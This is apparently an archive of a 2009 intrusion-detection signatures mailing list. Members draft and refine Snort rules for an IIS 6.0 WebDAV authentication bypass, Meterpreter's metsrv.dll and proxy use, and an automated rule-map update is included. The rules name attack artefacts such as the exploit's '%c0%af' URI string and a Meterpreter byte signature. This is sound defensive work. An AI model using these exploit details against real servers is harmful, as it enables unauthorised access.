> as long as the "noalert" is excluded. Then a second rule for HTTP 200
> and check the first flowbit, with increased priority.
>
> PS: perhaps having generic flowbits rules for common HTTP status codes
> may be useful, to avoid redundant rules which rely on responses. This
> probably depends on what's currently in the ruleset, I haven't checked.
> -
>
> -=[ dxp ]=-
> 0xA3F3C6E3
>
>
> On Sun, 2009-05-17 at 06:28 -0700, Darren Spruell wrote:
>
>> Would it work the way I think to flowbit the request (with the
>> submitted rule) and look for a 200 status code in the response to flag
>> successful exploitation? I'd expect a failure would result in
>> something like a 40x (unauthorized, not found) or other error code.
>>
>> DS
>>
>> On Sat, May 16, 2009 at 9:55 PM, dxp wrote:
>>
>>> The text by Kingcope on milw0rm does specify the "translate: f" header in
>>> the first two examples. I have not tested this but it appears, if I read
>>> the advisory correctly, that this additional header is required to exploit
>>> the vulnerability. Without it the signature would pick up on many different
>>> web scans and would not be specific to this vulnerability.
>>>
>>> -
>>>
>>> -=[ dxp ]=-
>>> 0xA3F3C6E3
>>>
>>>
>>> On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote:
>>>
>>> I'm submitting this for the recent IIS 6.0 vulnerability
>>> http://isc.sans.org/diary.html?storyid=6397
>>>
>>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>>> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
>>> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
>>> sid:xxxxxx; gid:1; rev:1;)
>>>
>>> I also read that "translate: f" was required but the information on
>>> milw0rm.com did not use that in all 3 examples.
>>> _______________________________________________
>>> Emerging-sigs mailing list
>>> Emerging-sigs at emergingthreats.net
>>> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>>>

Thanks,
Wolvee.

From mcholste at gmail.com Mon May 18 10:35:18 2009
From: mcholste at gmail.com (Martin Holste)
Date: Mon, 18 May 2009 09:35:18 -0500
Subject: [Emerging-Sigs] Hupigon falses with Google search bot on sids 2009290 and 2009292
Message-ID:

A Google search bot is triggering 2009290 and 2009292 on a fairly regular basis for some of the pages we host. It looks like this consists of a connection with dsize < 28 to set the first flowbit followed by a dsize < 6, which is apparently general enough to trigger many of these every day. The packets Snort logs for these hits have no data payload, which satisfies the dsize < 28 and dsize < 6 requirements. Can this be refined at all to avoid these falses?

Thanks,

Martin

From mcholste at gmail.com Mon May 18 10:46:13 2009
From: mcholste at gmail.com (Martin Holste)
Date: Mon, 18 May 2009 09:46:13 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References:
Message-ID:

Thanks for submitting that! My question is whether the normalization of the HTTP preproc will affect what data is passed to the content engine for inspection. Has anyone verified this rule detects a successful (or unsuccessful) exploit?

Thanks,

Martin

On Sat, May 16, 2009 at 4:13 PM, Nick Randolph wrote:
> I'm submitting this for the recent IIS 6.0 vulnerability
> http://isc.sans.org/diary.html?storyid=6397
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> sid:xxxxxx; gid:1; rev:1;)
>
> I also read that "translate: f" was required but the information on
> milw0rm.com did not use that in all 3 examples.
>

From randolphdavidn at gmail.com Mon May 18 11:11:39 2009
From: randolphdavidn at gmail.com (Nick Randolph)
Date: Mon, 18 May 2009 11:11:39 -0400
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References:
Message-ID:

It looks like it does affect it.
The sig below will detect the "%c0%af" in the URL. The problem is it will detect it anywhere else as well. I guess to help cut down on false positives you could change the $HOME_NET to $HTTP_SERVERS if you have that defined for your environment.

alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
Auth Bypass"; flow:established,to_server; content:"|25|c0|25|af";
nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
sid:xxxxxx; gid:1; rev:2;)

On Mon, May 18, 2009 at 10:46 AM, Martin Holste wrote:
> Thanks for submitting that! My question is whether the normalization of the
> HTTP preproc will affect what data is passed to the content engine for
> inspection. Has anyone verified this rule detects a successful (or
> unsuccessful) exploit?
>
> Thanks,
>
> Martin
>
> On Sat, May 16, 2009 at 4:13 PM, Nick Randolph wrote:
>>
>> I'm submitting this for the recent IIS 6.0 vulnerability
>> http://isc.sans.org/diary.html?storyid=6397
>>
>> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
>> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
>> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
>> sid:xxxxxx; gid:1; rev:1;)
>>
>> I also read that "translate: f" was required but the information on
>> milw0rm.com did not use that in all 3 examples.
>

From spooker at gmail.com Mon May 18 12:01:33 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Mon, 18 May 2009 13:01:33 -0300
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References:
Message-ID: <9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com>

Good post about it
http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html

Regards,

On Mon, May 18, 2009 at 12:11 PM, Nick Randolph wrote:
> It looks like it does affect it.
> The sig below will detect the "%c0%af" in the URL. The problem is it
> will detect it anywhere else as well. I guess to help cut down on
> false positives you could change the $HOME_NET to $HTTP_SERVERS if you
> have that defined for your environment.
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> Auth Bypass"; flow:established,to_server; content:"|25|c0|25|af";
> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> sid:xxxxxx; gid:1; rev:2;)
>
> On Mon, May 18, 2009 at 10:46 AM, Martin Holste wrote:
> > Thanks for submitting that! My question is whether the normalization of
> > the HTTP preproc will affect what data is passed to the content engine for
> > inspection. Has anyone verified this rule detects a successful (or
> > unsuccessful) exploit?
> >
> > Thanks,
> >
> > Martin
> >
> > On Sat, May 16, 2009 at 4:13 PM, Nick Randolph wrote:
> >>
> >> I'm submitting this for the recent IIS 6.0 vulnerability
> >> http://isc.sans.org/diary.html?storyid=6397
> >>
> >> alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote
> >> Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af";
> >> nocase; reference:url,isc.sans.org/diary.html?storyid=6397;
> >> sid:xxxxxx; gid:1; rev:1;)
> >>
> >> I also read that "translate: f" was required but the information on
> >> milw0rm.com did not use that in all 3 examples.
> >
>

--
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From emerging at emergingthreats.net Mon May 18 16:00:10 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Mon, 18 May 2009 16:00:10 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090518200010.DC2F44504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Mon May 18 16:00:10 2009 [***]

[*] Rules modifications: [*]
    None.
[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (26):
2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

-> Added to emerging-sid-msg.map.txt (26):
2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500139 || ET COMPROMISED Known Compromised or Hostile Host Traffic (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500140 || ET COMPROMISED Known Compromised or Hostile Host Traffic (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500141 || ET COMPROMISED Known Compromised or Hostile Host Traffic (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500142 || ET COMPROMISED Known Compromised or Hostile Host Traffic (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500143 || ET COMPROMISED Known Compromised or Hostile Host Traffic (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510139 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (140) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510140 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (141) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510141 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (142) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510142 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (143) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510143 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (144) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From ccentore at comcast.net Mon May 18 16:41:07 2009
From: ccentore at comcast.net (ccentore@comcast.net)
Date: Mon, 18 May 2009 20:41:07 +0000 (UTC)
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
Message-ID: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>

This rule detects the transfer of the metsrv.dll file.
It somewhat overlaps with rule 200419 / "ET POLICY PE EXE or DLL Windows file download", but I thought it might be a decent inclusion since, once downloaded, the metsrv.dll typically stays in memory and can be difficult to find if you don't know you are looking for it.

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1 E9 85|"; classtype:xxxxx; reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx; rev:1;)

From dxp2532 at gmail.com Mon May 18 16:55:23 2009
From: dxp2532 at gmail.com (dxp)
Date: Mon, 18 May 2009 16:55:23 -0400
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>
Message-ID: <1242680123.6901.11.camel@kinta>

It's a very good idea. It's definitely worth knowing what was thrown at you.

Have you tested this for False Positives? What specifically do those bytes represent from the DLL?

-
-=[ dxp ]=-
0xA3F3C6E3

On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:
> This rule detects the transfer of the metsrv.dll file. It somewhat
> overlaps with rule 200419 / "ET POLICY PE EXE or DLL Windows file
> download", but I thought it might be a decent inclusion since, once
> downloaded, the metsrv.dll typically stays in memory and can be
> difficult to find if you don't know you are looking for it.
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter
> metsrv.dll downloaded"; flow: established; content:"|DB 39 45 FC 0F 94
> C0 89 45 FC D1 E9 85|"; classtype:xxxxx;
> reference:url,www.metasploit.com/documents/meterpreter.pdf; sid:
> xxxxx; rev:1;)
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

From phatbuckett at gmail.com Mon May 18 18:02:49 2009
From: phatbuckett at gmail.com (Darren Spruell)
Date: Mon, 18 May 2009 15:02:49 -0700
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <1242680123.6901.11.camel@kinta>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net> <1242680123.6901.11.camel@kinta>
Message-ID: <839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com>

Interested also to know if the any/any port spec can be narrowed with some modifiers on the content check. I'm supposing not. :)

DS

On Mon, May 18, 2009 at 1:55 PM, dxp wrote:
> It's a very good idea. It's definitely worth knowing what was thrown at
> you.
> Have you tested this for False Positives? What specifically do those bytes
> represent from the DLL?
>
> -
> -=[ dxp ]=-
> 0xA3F3C6E3
>
> On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:
>
> This rule detects the transfer of the metsrv.dll file. It somewhat overlaps
> with rule 200419 / "ET POLICY PE EXE or DLL Windows file download", but I
> thought it might be a decent inclusion since, once downloaded, the
> metsrv.dll typically stays in memory and can be difficult to find if you
> don't know you are looking for it.
>
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll
> downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1
> E9 85|"; classtype:xxxxx;
> reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx;
> rev:1;)

--
Darren Spruell
phatbuckett at gmail.com

From r.fulton at auckland.ac.nz Mon May 18 18:34:27 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Tue, 19 May 2009 10:34:27 +1200
Subject: [Emerging-Sigs] reference for sid:2008134
Message-ID:

reference:url,http://www.threatexpert.com/report.aspx?md5=ea70e0971cc490a15e53d24ad6564403

I've added it to the wiki. Might be worth adding to the rule. URL and site match exactly...

Russell

From jules at visionintel.com Mon May 18 19:35:18 2009
From: jules at visionintel.com (Jules Pagna Disso)
Date: Tue, 19 May 2009 00:35:18 +0100
Subject: [Emerging-Sigs] proxy
Message-ID: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com>

hi guys,

is there a way we can identify traffic behind a proxy server? / identify that a proxy server is being used?

I assume that someone is trying to bypass some restrictions of some sort.

do we have a rule for that? or no solution?

thanks,
Jules

From jpleger at gmail.com Mon May 18 19:42:53 2009
From: jpleger at gmail.com (James Pleger)
Date: Mon, 18 May 2009 16:42:53 -0700
Subject: [Emerging-Sigs] proxy
In-Reply-To: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com>
References: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com>
Message-ID: <32EAA87D-21CF-4DB9-BE32-C2261249FE94@gmail.com>

The only thing that you can detect is by looking at the VIA and X-Forwarded-For headers, which typically indicate proxy activity. There are some other headers depending on the proxy but those are the most common. In regards to finding what is behind the proxy, that is going to be difficult unless they send the X-Forwarded-For headers.

There are some proxy blacklists which have lists of open proxies which might be useful for you (although I don't have the URLs, you can google for them probably).

Regards,

James Pleger
e: jpleger at gmail.com
g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9

On May 18, 2009, at 4:35 PM, Jules Pagna Disso wrote:
> hi guys,
>
> is there a way we can identify traffic behind a proxy server? /
> identify that a proxy server is being used?
>
> I assume that someone is trying to bypass some restrictions of some
> sort.
>
> do we have a rule for that? or no solution?
>
> thanks,
> Jules

From jpleger at gmail.com Mon May 18 19:46:07 2009
From: jpleger at gmail.com (James Pleger)
Date: Mon, 18 May 2009 16:46:07 -0700
Subject: [Emerging-Sigs] proxy
In-Reply-To: <32EAA87D-21CF-4DB9-BE32-C2261249FE94@gmail.com>
References: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com> <32EAA87D-21CF-4DB9-BE32-C2261249FE94@gmail.com>
Message-ID: <9EF96076-99F8-421D-8BB1-67E2D9742517@gmail.com>

I also forgot to add that the signatures that are in the ET rulesets are mostly for detecting outbound proxy connections from your network to an external box, which could indicate that a client on your host is doing naughty things.

Regards,

James Pleger
e: jpleger at gmail.com
g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9

On May 18, 2009, at 4:42 PM, James Pleger wrote:
> The only thing that you can detect is by looking at the VIA and X-
> Forwarded-For headers, which typically indicate proxy activity.
> There are some other headers depending on the proxy but those are
> the most common. In regards to finding what is behind the proxy,
> that is going to be difficult unless they send the X-Forwarded-For
> headers.
>
> There are some proxy blacklists which have lists of open proxies
> which might be useful for you (although I don't have the URLs, you can
> google for them probably).
>
> Regards,
>
> James Pleger
> e: jpleger at gmail.com
> g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9
>
> On May 18, 2009, at 4:35 PM, Jules Pagna Disso wrote:
>
>> hi guys,
>>
>> is there a way we can identify traffic behind a proxy server? /
>> identify that a proxy server is being used?
>>
>> I assume that someone is trying to bypass some restrictions of some
>> sort.
>>
>> do we have a rule for that?
>> or no solution?
>>
>> thanks,
>> Jules

From spooker at gmail.com Mon May 18 23:22:30 2009
From: spooker at gmail.com (Rodrigo Montoro(Sp0oKeR))
Date: Tue, 19 May 2009 00:22:30 -0300
Subject: [Emerging-Sigs] proxy
In-Reply-To: <9EF96076-99F8-421D-8BB1-67E2D9742517@gmail.com>
References: <69544300905181635m74ff68efqa7d50c243457684d@mail.gmail.com> <32EAA87D-21CF-4DB9-BE32-C2261249FE94@gmail.com> <9EF96076-99F8-421D-8BB1-67E2D9742517@gmail.com>
Message-ID: <9255886c0905182022q702fc7ecs7e2aa6655d48953b@mail.gmail.com>

The snort http_inspect preprocessor has a feature, proxy_alert:

This enables global alerting on HTTP server proxy usage. By configuring HTTP Inspect servers and enabling allow_proxy_use, you will only receive proxy use alerts for web users that aren't using the configured proxies or are using a rogue proxy server. Please note that if users aren't required to configure web proxy use, then you may get a lot of proxy alerts. So, please only use this feature with traditional proxy environments. Blind firewall proxies don't count.

http://www.snort.org/docs/snort_htmanuals/htmanual_284/node78.html

Hope it helps.

Regards,

On Mon, May 18, 2009 at 8:46 PM, James Pleger wrote:
>
> I also forgot to add that the signatures that are in the ET rulesets are mostly for detecting outbound proxy connections from your network to an external box, which could indicate that a client on your host is doing naughty things.
>
> Regards,
> James Pleger
> e: jpleger at gmail.com
> g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9
>
> On May 18, 2009, at 4:42 PM, James Pleger wrote:
>
> The only thing that you can detect is by looking at the VIA and X-Forwarded-For headers, which typically indicate proxy activity. There are some other headers depending on the proxy but those are the most common. In regards to finding what is behind the proxy, that is going to be difficult unless they send the X-Forwarded-For headers.
> There are some proxy blacklists which have lists of open proxies which might be useful for you (although I don't have the URLs, you can google for them probably).
>
> Regards,
> James Pleger
> e: jpleger at gmail.com
> g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9
>
> On May 18, 2009, at 4:35 PM, Jules Pagna Disso wrote:
>
> hi guys,
>
> is there a way we can identify traffic behind a proxy server? / identify that a proxy server is being used?
>
> I assume that someone is trying to bypass some restrictions of some sort.
>
> do we have a rule for that? or no solution?
>
> thanks,
> Jules

--
===========================
Rodrigo Montoro (Sp0oKeR)
http://www.spooker.com.br
http://www.snort.org.br
http://www.linkedin.com/in/spooker
===========================

From shirkdog_list at hotmail.com Mon May 18 23:32:21 2009
From: shirkdog_list at hotmail.com (Shirk Dog)
Date: Mon, 18 May 2009 23:32:21 -0400
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net> <1242680123.6901.11.camel@kinta> <839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com>
Message-ID:

Well, I was working on a FULL list of all of the Meterpreter commands, as they are static for now. The signatures were going to follow when I was done, about 20 of them.

Shirkdog
Free your mind...
http://www.shirkdog.us

> Date: Mon, 18 May 2009 15:02:49 -0700
> From: phatbuckett at gmail.com
> To: dxp2532 at gmail.com
> CC: emerging-sigs at emergingthreats.net
> Subject: Re: [Emerging-Sigs] Metasploit's Meterpreter detection
>
> Interested also to know if the any/any port spec can be narrowed with
> some modifiers on the content check. I'm supposing not. :)
>
> DS
>
> On Mon, May 18, 2009 at 1:55 PM, dxp wrote:
> > It's a very good idea. It's definitely worth knowing what was thrown at
> > you.
> > Have you tested this for False Positives? What specifically do those bytes
> > represent from the DLL?
> >
> > -
> > -=[ dxp ]=-
> > 0xA3F3C6E3
> >
> > On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:
> >
> > This rule detects the transfer of the metsrv.dll file. It somewhat overlaps
> > with rule 200419 / "ET POLICY PE EXE or DLL Windows file download", but I
> > thought it might be a decent inclusion since, once downloaded, the
> > metsrv.dll typically stays in memory and can be difficult to find if you
> > don't know you are looking for it.
> >
> > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll
> > downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1
> > E9 85|"; classtype:xxxxx;
> > reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx;
> > rev:1;)
>
> --
> Darren Spruell
> phatbuckett at gmail.com

From ccentore at comcast.net Tue May 19 10:29:56 2009
From: ccentore at comcast.net (ccentore@comcast.net)
Date: Tue, 19 May 2009 14:29:56 +0000 (UTC)
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <1242680123.6901.11.camel@kinta>
Message-ID: <1564217799.11251261242743396703.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net>

Ok, here is the disassembled output of the content string:

0000621D  DB39     FSTP TBYTE PTR DS:[ECX]
0000621F  45       INC EBP
00006220  FC       CLD
00006221  0F94C0   SETE AL
00006224  8945 FC  MOV DWORD PTR SS:[EBP-4],EAX
00006227  D1E9     SHR ECX,1
00006229  85C9     TEST ECX,ECX

It is non-repeating in the dll and I have not been able to find the pattern in other dll's that I have tested. I wish I knew what compiler was used to create it, then maybe I could decompile it to maybe find something more unique. If you have any suggestions on how to look for a pattern, that would be great.

-Chris

----- Original Message -----
From: "dxp"
To: ccentore at comcast.net
Cc: emerging-sigs at emergingthreats.net
Sent: Monday, May 18, 2009 3:55:23 PM GMT -06:00 US/Canada Central
Subject: Re: [Emerging-Sigs] Metasploit's Meterpreter detection

It's a very good idea. It's definitely worth knowing what was thrown at you.
Have you tested this for False Positives? What specifically do those bytes represent from the DLL?

-
-=[ dxp ]=-
0xA3F3C6E3

On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:

This rule detects the transfer of the metsrv.dll file. It somewhat overlaps with rule 200419 / "ET POLICY PE EXE or DLL Windows file download", but I thought it might be a decent inclusion since, once downloaded, the metsrv.dll typically stays in memory and can be difficult to find if you don't know you are looking for it.

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1 E9 85|"; classtype:xxxxx; reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx; rev:1;)

From David.R.Wharton at regions.com Tue May 19 10:32:53 2009
From: David.R.Wharton at regions.com (David.R.Wharton@regions.com)
Date: Tue, 19 May 2009 09:32:53 -0500
Subject: [Emerging-Sigs] proxy
In-Reply-To: <9EF96076-99F8-421D-8BB1-67E2D9742517@gmail.com>
Message-ID:

While not perfect, you could flag on an absoluteURI in an HTTP request:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET POLICY Proxy Usage Detected"; flow:established,to_server; uricontent:"http"; nocase; pcre:"/^(OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT)\shttps?://.*\sHTTP/1\.[01]\x0D\x0A/i"; classtype:policy-violation; sid:xxxxxx; rev:1;)

-David Wharton

James Pleger
Sent by: emerging-sigs-bounces at emergingthreats.net
05/18/2009 06:46 PM
To: James Pleger
cc: Emerging-sigs at emergingthreats.net
Subject: Re: [Emerging-Sigs] proxy

I also forgot to add that the signatures that are in the ET rulesets are mostly for detecting outbound proxy connections from your network to an external box, which could indicate that a client on your host is doing naughty things.

Regards,

James Pleger
e: jpleger at gmail.com
g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9

On May 18, 2009, at 4:42 PM, James Pleger wrote:

The only thing that you can detect is by looking at the VIA and X-Forwarded-For headers, which typically indicate proxy activity. There are some other headers depending on the proxy but those are the most common. In regards to finding what is behind the proxy, that is going to be difficult unless they send the X-Forwarded-For headers.

There are some proxy blacklists which have lists of open proxies which might be useful for you (although I don't have the URLs, you can google for them probably).

Regards,

James Pleger
e: jpleger at gmail.com
g: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9D7141C9

